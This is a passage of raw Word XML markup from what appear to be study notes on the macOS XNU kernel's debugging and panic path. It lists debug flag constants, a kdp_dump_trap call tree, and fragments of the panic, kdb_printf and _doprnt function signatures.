          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x40</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PANIC_LOG_DUMP    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x80</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REBOOT_POST_CORE  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743BEE" w:rsidRDefault="00743BEE" w:rsidP="00743BEE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM_LOG_DUMP   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743BEE" w:rsidRDefault="00743BEE" w:rsidP="00743BEE"/>
    <w:p w:rsidR="00743BEE" w:rsidRPr="00743BEE" w:rsidRDefault="00743BEE" w:rsidP="00743BEE"/>
    <w:p w:rsidR="00214706" w:rsidRDefault="00B568BE" w:rsidP="00214706">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00214706">
        <w:t>kdp_dump_trap</w:t>
      </w:r>
      <w:r w:rsidRPr="003C51F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRPr="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="00B568BE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C51F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\kdp\kdp_udp.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214706" w:rsidRPr="00214706" w:rsidRDefault="00214706" w:rsidP="00214706">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214706">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_dump_trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C51F7" w:rsidRDefault="003C51F7" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C51F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_raise_exception</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C51F7" w:rsidRDefault="003C51F7" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C51F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_debugger_loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_panic_dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_machine_reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_connection_wait</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A70EE9" w:rsidRDefault="00A70EE9" w:rsidP="00A70EE9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A70EE9" w:rsidRPr="00A70EE9" w:rsidRDefault="00A70EE9" w:rsidP="00A70EE9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>panic_trap</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x86_saved_state64_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A70EE9" w:rsidRDefault="00A70EE9" w:rsidP="00A70EE9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A70EE9" w:rsidRPr="00A70EE9" w:rsidRDefault="00A70EE9" w:rsidP="00A70EE9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kdb_printf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70EE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"panic(cpu %d caller 0x%lx): "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="600" w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_doprnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="600" w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="600" w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    va_list         </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argp</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* character output routine */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="600" w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>putc</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
